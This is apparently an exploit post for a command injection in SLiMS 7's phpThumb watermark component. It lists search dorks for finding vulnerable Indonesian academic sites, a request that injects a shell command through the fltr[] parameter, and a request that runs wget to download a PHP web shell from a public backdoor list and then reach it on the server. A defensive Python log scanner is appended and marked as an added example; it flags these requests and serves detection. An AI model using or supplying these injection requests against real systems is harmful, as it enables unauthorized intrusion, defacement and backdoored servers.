Slims 7 PhpThumb Command Injection
Dork :
Powered By SLIMS 7 (Cendana)
inurl:/index.php?p=show_detail&id= "Detail Cantuman" site:ac.id
"Powered By Slims7" site:ac.id
~~~~
Check Vuln (command injected) : /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;ls -la;%20&phpThumbDebug=9
Upload shell :
/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9
File access :
/lib/watermark/shell.php
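For defenders, the requests above leave a recognizable trace in web server access logs: a phpThumb.php request whose fltr[] value carries more than a filter name and its "|"-separated arguments. The Python script below is an added example, not part of the original post or of SLiMS or phpThumb. The allow-list, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
FLTR_NAME_RE = re.compile(r"fltr(\[\d*\])?")
# Assumption: legitimate filter specs look like "blur|9" (name plus "|"-separated
# args). Tune this allow-list if your site uses filters that take free text.
SAFE_FLTR_RE = re.compile(r"[A-Za-z0-9|._#-]*")

def fltr_values(query):
    """Yield the decoded value of every fltr / fltr[] / fltr[n] parameter."""
    for pair in query.split("&"):  # split on "&" only, so ";" stays inside the value
        name, _, value = pair.partition("=")
        if FLTR_NAME_RE.fullmatch(unquote_plus(name)):
            yield unquote_plus(value)

def suspicious_fltr(line):
    """Return the fltr values in one log line that fall outside the allow-list."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/phpthumb.php"):
        return []
    return [v for v in fltr_values(url.query) if not SAFE_FLTR_RE.fullmatch(v)]

def scan(lines):
    """Return (line_number, offending_values) for every flagged log entry."""
    return [(n, bad) for n, line in enumerate(lines, 1) if (bad := suspicious_fltr(line))]

# Constructed sample entries (combined log format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Sep/2020:10:00:00 +0000] "GET /lib/watermark/phpThumb.php'
    '?src=file.jpg&fltr[]=blur|9 HTTP/1.1" 200 2048 "-" "-"',
    '203.0.113.5 - - [10/Sep/2020:10:00:01 +0000] "GET /lib/watermark/phpThumb.php'
    '?src=file.jpg&fltr%5B%5D=blur%7C9 HTTP/1.1" 200 2048 "-" "-"',
    '203.0.113.7 - - [10/Sep/2020:10:00:02 +0000] "GET /lib/watermark/phpThumb.php'
    '?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg'
    '%20jpeg:file.jpg%20;ls%20-la;%20&phpThumbDebug=9 HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [10/Sep/2020:10:00:03 +0000] "GET /index.php'
    '?p=show_detail&id=1 HTTP/1.1" 200 4096 "-" "-"',
]

if __name__ == "__main__":
    for n, bad in scan(SAMPLE_LOG):
        print(f"line {n}: suspicious fltr value(s): {bad!r}")
```

A flagged entry is a reason to review the /lib/watermark/ directory for files that do not belong to the installation.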
References : https://www.bandung6etar.my.id/2020/09/deface-cms-slims-command-injection.html